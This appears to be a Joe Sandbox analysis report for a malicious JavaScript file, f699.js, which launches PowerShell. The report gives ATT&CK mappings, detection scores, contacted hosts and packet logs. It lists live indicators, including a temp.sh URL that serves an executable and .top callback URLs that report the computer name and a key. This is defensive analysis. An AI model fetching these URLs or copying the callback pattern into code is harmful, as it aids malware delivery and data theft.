Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting		Valid Accounts31
Windows Management Instrumentation		2
Scripting		11
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution		Logon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
f699.js8%ReversingLabs
f699.js8%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
temp.sh3%VirustotalBrowse
isyzgez.top0%VirustotalBrowse
mknjddllgakhaje.top0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://www.microsoft.c9t0%Avira URL Cloudsafe
https://temp.sh0%Avira URL Cloudsafe
http://isyzgez.top/1.php?s=mints10%Avira URL Cloudsafe
http://temp.sh0%Avira URL Cloudsafe
https://temp.sh/bfseS/ruzxs.exe100%Avira URL Cloudmalware
http://mknjddllgakhaje.top0%Avira URL Cloudsafe
http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints10%Avira URL Cloudsafe
http://isyzgez.top0%Avira URL Cloudsafe
http://temp.sh3%VirustotalBrowse
https://temp.sh/bfseS/ruzxs.exe10%VirustotalBrowse
http://isyzgez.top/1.php?s=mints10%VirustotalBrowse
http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints10%Avira URL Cloudsafe
http://isyzgez.top0%VirustotalBrowse
https://temp.sh1%VirustotalBrowse
http://mknjddllgakhaje.top0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
temp.sh
51.91.79.17
truefalseunknown
isyzgez.top
192.153.57.159
truefalseunknown
mknjddllgakhaje.top
164.90.149.198
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://isyzgez.top/1.php?s=mints1false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://temp.sh/bfseS/ruzxs.exefalse
  • 10%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1false
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://temp.shpowershell.exe, 00000002.00000002.1756548460.000001B32FB37000.00000004.00000800.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://www.microsoft.c9tpowershell.exe, 00000002.00000002.1800811353.000001B346500000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmptrue
    • URL Reputation: malware
    • URL Reputation: malware
    		unknown
    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://temp.shpowershell.exe, 00000002.00000002.1756548460.000001B32FBAF000.00000004.00000800.00020000.00000000.sdmpfalse
        • 3%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://mknjddllgakhaje.toppowershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://isyzgez.toppowershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  192.153.57.159
                  		isyzgez.topUnited States
                  		600OARNET-ASUSfalse
                  51.91.79.17
                  		temp.shFrance
                  		16276OVHFRfalse
                  164.90.149.198
                  		mknjddllgakhaje.topUnited States
                  		14061DIGITALOCEAN-ASNUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1416950
                  Start date and time:2024-03-28 10:31:35 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:f699.js
                  Detection:MAL
                  Classification:mal96.expl.evad.winJS@4/5@3/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 87%
                  • Number of executed functions: 12
                  • Number of non-executed functions: 6
                  Cookbook Comments:
                  • Found application associated with file extension: .js

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 3652 because it is empty
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  10:32:24API Interceptor46x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  51.91.79.17_Rechnung_DE04911985434_PDF.jsGet hashmaliciousUnknownBrowse
                    _Factura_623199941314391_PDF_.js.malware.jsGet hashmaliciousUnknownBrowse
                      UPDATE.JSGet hashmaliciousSocGholishBrowse
                        28990167362_PDF_.jsGet hashmaliciousUnknownBrowse
                          GIWX0678_9173423.jsGet hashmaliciousUnknownBrowse
                            NQRX0468_5871143.jsGet hashmaliciousUnknownBrowse
                              sduyvzep-top.ps1Get hashmaliciousUnknownBrowse
                                JKTX1269_8406031.jsGet hashmaliciousUnknownBrowse
                                  CETX0157_9066954.jsGet hashmaliciousUnknownBrowse
                                    2.txt.ps1Get hashmaliciousUnknownBrowse
                                      164.90.149.198UPDATE.JSGet hashmaliciousSocGholishBrowse
                                      • hlbibfkimfelcja.top/bdh9fo0skphtr.php?id=user-PC&key=28665590269&s=515

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      temp.sh_Rechnung_DE04911985434_PDF.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      _Factura_623199941314391_PDF_.js.malware.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      UPDATE.JSGet hashmaliciousSocGholishBrowse
                                      • 51.91.79.17
                                      28990167362_PDF_.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      GIWX0678_9173423.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      NQRX0468_5871143.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      sduyvzep-top.ps1Get hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      JKTX1269_8406031.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      CETX0157_9066954.jsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      2.txt.ps1Get hashmaliciousUnknownBrowse
                                      • 51.91.79.17

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      DIGITALOCEAN-ASNUSAhbJkpk3Z8.elfGet hashmaliciousUnknownBrowse
                                      • 134.209.44.115
                                      https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.euGet hashmaliciousUnknownBrowse
                                      • 134.122.57.34
                                      Mauqes.exeGet hashmaliciousNovaSentinelBrowse
                                      • 45.55.107.24
                                      https://hiwagaschoolofaesthetics.com/min/ax/i?ax988=tracy.gazdag@globalresourcedesign.com&utm=email.cx.beehiiv.com/e/c/eyJlbWFpbF9pZCI6ImRnVGYtd1lCQVBfN0hmNzdIUUdPYmVxNE53MjltRmU4MkJxTVIxMD0iLCJocmVmIjoiaHR0cHM6Ly93d3cuYmVlaGlpdi5jb20vY291cnNlcy9uZXdzbGV0dGVyLXhwP29mZmVyX2lkPXdlbGNvbWUyMFx1MDAyNnV0bV9=Get hashmaliciousHTMLPhisherBrowse
                                      • 178.128.193.79
                                      WRbiXjr77v.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                      • 159.203.162.18
                                      https://48227f1df9cc685b88b4cfbd9e51bd84.serveo.net/login.htmlIP:Get hashmaliciousUnknownBrowse
                                      • 138.68.79.95
                                      https://crm.mr.bet/track/click/c95d3si4y/c6561686462716b65686f62737c6569704564657e23756c6b69627b6e23616?target=https%3A%2F%2Fcrm.mr.bet%2Funsubscribe%2Findex%2FeyJtYWlsIjoibGVhaGRyYWtlaG9yc2xleUBlZHUuc2Vsa2lyay5jYSIsInByb2plY3QiOjMsImJ1bGsiOjYzNjg3MjIsInNpZ24iOiJDQVRQRjhRdzRRcXBpK2tcL2RFckprVmY4N0hrPSJ9Get hashmaliciousUnknownBrowse
                                      • 157.245.28.47
                                      gIzj2ZdSYV.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 128.199.139.145
                                      yjz3ZEaSau.elfGet hashmaliciousMoobotBrowse
                                      • 128.199.139.145
                                      97zyqEu4Nh.elfGet hashmaliciousMoobotBrowse
                                      • 159.89.180.200
                                      OARNET-ASUSHOHD9C7W11.elfGet hashmaliciousMoobotBrowse
                                      • 206.244.109.67
                                      9l2zY4BbAa.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.134.251.63
                                      6NlqBnezcC.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 157.134.80.17
                                      _Rechnung_DE04911985434_PDF.jsGet hashmaliciousUnknownBrowse
                                      • 192.153.57.61
                                      7rlvP4sWKG.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 140.222.172.139
                                      huhu.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 157.134.238.81
                                      CfmKNhPq8T.elfGet hashmaliciousUnknownBrowse
                                      • 206.21.116.240
                                      TduoIaOsBQ.elfGet hashmaliciousUnknownBrowse
                                      • 157.134.216.196
                                      1xGvWmAmvc.elfGet hashmaliciousUnknownBrowse
                                      • 140.220.121.162
                                      LhypGRxeG7.elfGet hashmaliciousUnknownBrowse
                                      • 130.108.111.153
                                      OVHFR66yaYNheLa.elfGet hashmaliciousUnknownBrowse
                                      • 139.99.9.172
                                      https://www.bsnews.it/2015/01/23/le-citta-piu-brutte-d-italia-brescia-al-nono-posto-in-classificaGet hashmaliciousUnknownBrowse
                                      • 146.59.136.188
                                      New Order 3118.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 51.79.229.7
                                      New Order 3118.docGet hashmaliciousAgentTeslaBrowse
                                      • 51.79.229.7
                                      yR5xIsCFuq.exeGet hashmaliciousAgentTeslaBrowse
                                      • 51.79.229.7
                                      EhPeM5ilb8.exeGet hashmaliciousAgentTeslaBrowse
                                      • 51.79.229.7
                                      7VzdKNO227.exeGet hashmaliciousUnknownBrowse
                                      • 91.121.86.59
                                      Mauqes.exeGet hashmaliciousNovaSentinelBrowse
                                      • 51.38.43.18
                                      SPECIFICATION.exeGet hashmaliciousAveMaria, UACMeBrowse
                                      • 51.77.167.59
                                      FLUKE 810 vibration Tester.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 144.217.159.195

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ex.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                      • 51.91.79.17
                                      Move Mouse.exeGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 51.91.79.17
                                      aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                      • 51.91.79.17
                                      RFQ20240327_Lista comercial_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 51.91.79.17
                                      Richiesta di preventivo_RFQ03272024_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 51.91.79.17
                                      invoicee.vbsGet hashmaliciousUnknownBrowse
                                      • 51.91.79.17
                                      RFQ20240327_Lista commerciale.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 51.91.79.17
                                      salaryinfo24.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 51.91.79.17
                                      IMCA Nowe zam#U00f3wienie.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 51.91.79.17

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllul/nq/llh:NllUyt
                                      MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                      SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                      SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                      SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e................................................@..........

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3mn3us3.kz4.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iohiyljz.y21.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jizrjkio.ryj.psm1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzftwxy2.15e.ps1

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      Static File Info

                                      General

                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (1373)
                                      Entropy (8bit):3.335006923597387
                                      TrID:
                                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                      • MP3 audio (1001/1) 32.22%
                                      • Lumena CEL bitmap (63/63) 2.03%
                                      • Corel Photo Paint (41/41) 1.32%
                                      File name:f699.js
                                      File size:1'253'522 bytes
                                      MD5:1e8ca7d25ee56d99775b19057e4b6d4c
                                      SHA1:faac5ed0ade48c88814f3cd8f573406f7a5931d7
                                      SHA256:f699b87dd723fe073c813f7b503a6012254d5da5702376caab7cc25dbae543f2
                                      SHA512:128bf4b638e2ae42b9f5ee91947ca0cd7fbd6d375711fd2917a9f845b685b29434b14c60ef2306ce0ee8ade0209b99b39c7d6c72728953b5be38fabcd7c131ed
                                      SSDEEP:3072:1X5NvtKLphROse9auoJyjcj2RmWEDxZgw9Ss0XKOH22wixSb1HsCzJdGfJ3zZ8xP:m5L
                                      TLSH:7E453211A3FD5608FAF73F806DB5A2A40E26BCA6EDB9D29D1250105E8A72F40DD71733
                                      File Content Preview:..v.a.r. .B.e.l.i.c.i.t.e.d.h.e.r.o.n.l.y. .=. .".h.a.s. .l.e.t.t.e.r.s. .B.r.o.w.n. .t.h.e. .T.H.E. .V.I.I. .r.e.p.r.e.s.e.n.t.a.t.i.v.e.s. .a.n.y. .m.a.t.t.e.r.s. .m.e.r.e. .b.e.e.n. .c.o.u.n.t.e.d. .t.h.e. .m.a.i.n.t.a.i.n.i.n.g. .H.e.r.e. .e.m.i.n.e.n

                                      File Icon

                                      Icon Hash:68d69b8bb6aa9a86

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      03/28/24-10:32:31.974882UDP2856553ETPRO TROJAN TA582 Domain in DNS Lookup6539253192.168.2.41.1.1.1

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 28, 2024 10:32:28.660428047 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:28.840749025 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:28.840842009 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:28.859268904 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.039797068 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421091080 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421119928 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421145916 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421168089 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421278954 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421293974 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421325922 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.421325922 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.421350002 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.421490908 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421504021 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421540976 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.421679020 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421694040 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.421734095 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.602478981 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.602503061 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.602514982 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.602526903 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.602540016 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.602554083 CET8049729192.153.57.159192.168.2.4
                                      Mar 28, 2024 10:32:29.602680922 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:29.602680922 CET4972980192.168.2.4192.153.57.159
                                      Mar 28, 2024 10:32:32.089237928 CET4973080192.168.2.4164.90.149.198
                                      Mar 28, 2024 10:32:32.255009890 CET8049730164.90.149.198192.168.2.4
                                      Mar 28, 2024 10:32:32.255155087 CET4973080192.168.2.4164.90.149.198
